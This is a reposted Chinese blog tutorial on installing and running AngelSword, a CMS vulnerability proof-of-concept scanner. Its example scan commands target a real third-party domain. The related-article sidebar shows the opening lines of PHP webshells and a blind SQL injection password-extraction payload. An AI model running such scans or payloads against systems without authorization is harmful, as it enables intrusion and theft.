PJzhang:漏洞渗透测试框架“天使之剑(AngelSword)”

最新推荐文章于 2024-07-26 14:53:47 发布
最新推荐文章于 2024-07-26 14:53:47 发布
阅读量563 收藏
点赞数
文章标签: 操作系统 php git
原文链接:http://www.cnblogs.com/landesk/p/10872511.html
版权

猫宁!!!

参考链接:

www.phpinfo.cc/?post=42

https://www.freebuf.com/sectool/149883.html

 

同事介绍了一款渗透测试框架AngelSword,中文就是天使之剑,看了一下作者,是Lucifer1993,之前用过他的struts 2系列漏洞测试工具,很好用。

这个是工具的github地址:

https://github.com/Lucifer1993/AngelSword

目前这个工具已经基本停止维护了,而且作者在readme中也没有太多相关的介绍。

我用的系统是kali linux

先下载到本地

git clone https://github.com/Lucifer1993/AngelSword.git

程序是采用python 3写的,kali linux上默认安装有python3和python2,pip2可以正常用,pip3需要安装,不过不麻烦。

输入命令:

apt-get install python3-pip
好了。

setuptools这个kali linux默认也是安装好的。

执行命令:pip3 install setuptools

返回:Requirement already satisfied: setuptools in /usr/lib/python3/dist-packages (40.8.0),说明早已安装。

查看文件夹AngelSword中的requirements.txt,有9个python模块需要安装好。

paramiko==2.4.2
pymongo==3.7.2
PyMySQL==0.9.2
pexpect==4.6.0
termcolor==1.1.0
requests==2.20.0
beautifulsoup4==4.6.3
elasticsearch==6.3.1
redis==2.10.6

为了保证安装的都是最新版,可以依次pip3 install  paramiko,其余的同样操作即可。

进入AngelSword文件夹

cd /root/AngelSword

一切完备之后,执行python3 AngelSword.py,显示出基础命令行选项。

有关各个命令选项的意思,结合在线翻译初步进行了解,例如:

List scanner verbose   扫描器详细列表

Checksum and clear   校验与清除

其余的可以在实例中进一步认识。

获取帮助内容

python3 AngelSword.py -h


天使之剑工具可以认为是一个cms(内容管理系统)通用漏洞的POC库与测试框架。

针对站点执行all POC检测,此处接一个域名URL即可。

python3 AngelSword.py -u https://www.baidu.com

直接列出所有的漏洞检测POC,对于漏洞的所有种类要全部看一遍,知晓POC的类型是什么。

python3 AngelSword.py -l

根据关键词可以搜索到discuz论坛系统对应的几个漏洞,下面展示的是discuz的。

python3 AngelSword.py -s discuz

从搜索到的POC中调用一个POC模块对目标站点进行测试。

python3 AngelSword.py -m discuz_x25_path_disclosure -t https://www.baidu.com

如果有1个URL,可以采用上面的,如果URL很多,可以批量测试,就用到-f了,URL要一行一行的排列。

python3 AngelSword.py -m discuz_x25_path_disclosure -f test.txt

用搜索出来的POC对某个URL进行扫描,不过首先要用-s关键此搜索锁定特定POC,需要执行两条命令才行

python3 AngelSword.py -s discuz

python3 AngelSword.py -r all -t https://www.baidu.com

如果想要对POC进行修改,可以这样,也可以把每一个POC看一遍,了解背后原理,通过查看POC可知输入域名URL,不主动加路径,确实如此。

vim编辑模式。

python3 AngelSword.py -m discuz_x25_path_disclosure -e

 

显示框架中有的POC类型及其数量

python3 AngelSword.py -v

说明一下POC测试目标时调用的python文件路径都在哪里。

python3 AngelSword.py -c

 

 

虽然作者已经不更新了,但是天使之剑不失为一个简单易上手的渗透测试框架,而且通过一个好工具,可以扩展了解一下对方的其他工具类型。

转载于:https://www.cnblogs.com/landesk/p/10872511.html

weixin_30604651
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
送一个大马给有需要的人,请不要做非法之事
qq_42966617的博客
06-16 8万+
今天站点被人爆破,并成功入马,现在把马放出来,给有需要的人。 <?php header("Content-type:text/html;charset=gbk"); $password='fool'; $shellname='MrFooL'; $myurl=null; error_reporting(0); ob_start(); define('myaddress',$_SERVER['SCRIPT_FILENAME']); define('postpass',$password); define(
分析 PHP大马-php_mof SHELL
weixin_30840253的博客
06-23 700
Part 1 前言   https://www.phpinfo.cc/?post=30,这个马子,看上去满不错,我想要源码。 <?php $password = 'phpinfo';//登录密码 //----------功能程序------------------// $c = "chr"; session_start(); if (empty($_SESSION['Php...
Kali安装天使之剑AngelSword,python3的poc!!
来到了学渣的博客
03-18 1589
Kali安装天使之剑AngelSword 尝鲜 前言: AngelSword是由python3编写的简易的cms分解检测框架。预先帮助有安全经验的安全工程师对已知的应用快速发现突破。 github地址:https://github.com/Lucifer1993/AngelSword freebuf的介绍:https://www.freebuf.com/sectool/149883.html ...
python网络安全设计_专为渗透测试人员设计的 Python 工具大合集
weixin_39729840的博客
11-20 296
如果你对漏洞挖掘、逆向工程分析或渗透测试感兴趣的话,我第一个要推荐给你的就是Python编程语言。Python不仅语法简单上手容易,而且它还有大量功能强大的库和程序可供我们使用。在这篇文章中,我们会给大家介绍其中的部分工具。注:本文罗列出来的工具绝大部分都是采用Python编写的,其中有一小部分还使用了C语言库。Network(网络)lScapy:一款强大的交互式数据报分析工具,可用作发送、嗅探、...
“暗黑天使”降临:DarkAngels勒索病毒解析
wangluo12138的博客
01-30 534
近期,深信服深盾终端实验室在运营工作中发现了一种 ELF 格式的勒索软件。
解析一个PHP木马,PHP文件上传安全检测组件
Z.X的博客
12-01 6021
2021年12月1日08:43:32 前几天同事问我一个关于图片文件检测是否是脚本的问题,问题的根源就是文件上传图片,是否是隐藏的脚本问题 木马文件源码是这样的: <?php $password='phpyyds';//登录密码 //----------本程序完美支持PHP 4, PHP 5, PHP 7------------------// $c="chr"; session_sta...
渗透测试各种扫描工具集合(好用)
鹿鸣天涯
12-01 4212
转载自security-360.cn,觉得里面一些信息收集和git的工具挺不错的,可以看看。 集合github平台上的安全行业从业者自研开源扫描器的仓库,包括子域名枚举,数据库漏洞扫描,弱口令或信息泄漏扫描,端口扫描,指纹识别以及其他大型扫描器或模块化扫描器。 项目地址:https://github.com/We5ter/Scanners-Box 子域名枚举扫描器或爆破工具 https://github.com/lijiejie/subDomainsBrute(lijiejie开发的一款使用广泛的子域名爆
phpinfo 信息利用
qq_35405259的博客
12-05 1万+
0x01 基础信息 1.system info:提供详细的操作系统信息,为提权做准备。 2.extension_dir:php扩展的路径 3.$_SERVER[‘HTTP_HOST’]:网站真实IP、CDN什么的都不存在的,找到真实ip,扫一扫旁站,没准就拿下几个站。 4.$_SERVER[‘DOCUMENT_ROOT’]:web根目录 5.临时文件路径 这个配置在我的phpinfo中并没有...
PHPInfo()信息泄漏漏洞利用及提权
热门推荐
weixin_44023460的博客
12-08 3万+
Simeon PHPInfo函数信息泄露漏洞常发生一些默认的安装包,比如phpstudy等,默认安装完成后,没有及时删除这些提供环境测试的文件,比较常见的为phpinfo.php、1.php和test.php,虽然通过phpinfo获取的php环境以及变量等信息,但这些信息的泄露配合一些其它漏洞将有可能导致系统被渗透和提权。 1.1phpinfo函数 PHP中提供了PHPInfo()函数,该函数返...
FrameScan CMS漏洞扫描
浅笑996的博客
06-28 686
工具简介 GithubL:https://github.com/qianxiao996/FrameScan FrameScan是一款python3编写的简易的cms漏洞检测框架,支持多种检测方式,支持大多数CMS,可以自定义CMS类型及自行编写POC。旨在帮助有安全经验的安全工程师对已知的应用快速发现漏洞。 支持平台 Windows Linux MAC(请自测) 工具特点 单URL批量检测 单URL单漏洞检测 单URL指定CMS检测 多
在线cms识别|旁站|c段|信息泄露|cms漏洞扫描|端口扫描|
Pio
09-09 2071
工具 onlinetools Windows python3.7的版本是ok的,kali python3.8的版本还存在问题 可以尝试用3.7版本尝试 在线cms识别|旁站|c段|信息泄露|工控|系统|物联网安全|cms漏洞扫描|端口扫描 git clone https://github.com/iceyhexman/onlinetools.git cd onlinetools\ 因为我有python27和python37版本 python37 -m pip install -r requirements.
Path Disclosure Finder
cnbird's blog
10-14 584
http://code.google.com/p/inspathx/
DSVW通关教程
锋刃科技的博客
05-06 1357
首先看看我们的DSVW页面,很简单的一个页面,不多说直接开始吧 Blind SQL Injection (boolean) 可以看到我们的ID是没有被单引号包裹的 是布尔型注入,正确有回显,错误没有回显 ?id=2 AND SUBSTR((SELECT password FROM users WHERE name='admin'),1,1)='7' ?id=2 AND S...
全路径泄漏
iteye_16188的博客
11-17 718
参考: https://www.owasp.org/index.php/Full_Path_Disclosure http://yehg.net/lab/pr0js/view.php/path_disclosure_vulnerability.txt (一)危害 1)/var/www/html 可能导致文件夹遍历或LFI漏洞 2)/home/vicky/public_html/ ...
FrameScan-GUI CMS漏洞扫描
浅笑996的博客
06-28 1427
工具简介 FrameScan-GUI是一款python3和Pyqt编写的具有图形化界面的cms漏洞检测框架,是FrameScan的加强版。支持多种检测方式,支持大多数CMS,可以自定义CMS类型及自行编写POC。旨在帮助有安全经验的安全工程师对已知的应用快速发现漏洞Github地址:https://github.com/qianxiao996/FrameScan-GUI 下载地址:https://github.com/qianxiao996/FrameScan-GUI/releases 支持平台
Kali-linux使用SET实施攻击
weixin_33963594的博客
04-18 645
前面介绍了社会工程学工具包(SET)的简单使用。为了能帮助用户更容易的理解社会工程学的强大功能。本节将介绍使用社会工程学工具包实施各种攻击。 7.4.1 针对性钓鱼攻击向量 针对性钓鱼攻击向量通过构造特殊文件格式的漏洞进行渗透攻击,如利用Adobe Reader 8.1.0(PDF阅读器)的漏洞。实现钓鱼攻击向量主要通过发送邮件附件的方式,将包含渗透代码的文件发送到目标主机。当目标主机的用...
HarmonyOS应用开发者高级认证,Next版本发布后最新题库 - 多选题序号4
Gusha_的博客
07-23 1302
HarmonyOS应用开发者高级认证最新题库,编写于2024年7月19日,Next版本发布之后
Linux网络工具“瑞士军刀“集合
分享不一样的技术,与你一起共同成长!
07-26 216
下面结合之前的一些使用经验为大家介绍一下一些经典应用场景下,这个网络命令工具如何使用的。例如怎么查看当前服务器监听哪些端口、连接目标主机端口情况如何?平常我们在进行Linux服务器相关运维的时候,总会遇到一些网络相关的问题。我们可以借助这些小巧、功能强悍的工具帮助我们排查问题、解决问题...
基于宝塔的 Bytebase 可视化安装、配置、部署教程
最新发布
Bytebase的博客
07-26 329
Bytebase是一款使用Go语言开发的开源数据库管理软件,旨在为DBA(数据库管理员)、开发人员和平台工程师提供一个基于Web的协作工作区,用于管理数据库的整个生命周期。本文将介绍如何在宝塔面板上可视化安装、部署、配置Bytebase教程。
Linux:进程信号(一.认识信号、信号的产生及深层理解、Term与Core)
qq_74415153的博客
07-23 1523
1.认识信号 进程看待信号方式 2.信号的产生 2.1信号的处理的方式 --- signal()函数 2.2kil指令产生信号 2.3键盘产生信号 2.4系统调用发送信号 -kil系统调 用、raise()和abort()库函数 2.5软件条件产生信号 2.6异常产生信号 3.信号产生的深层理解 键盘产生信号 异常产生信号 4.Term与Core core文件
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值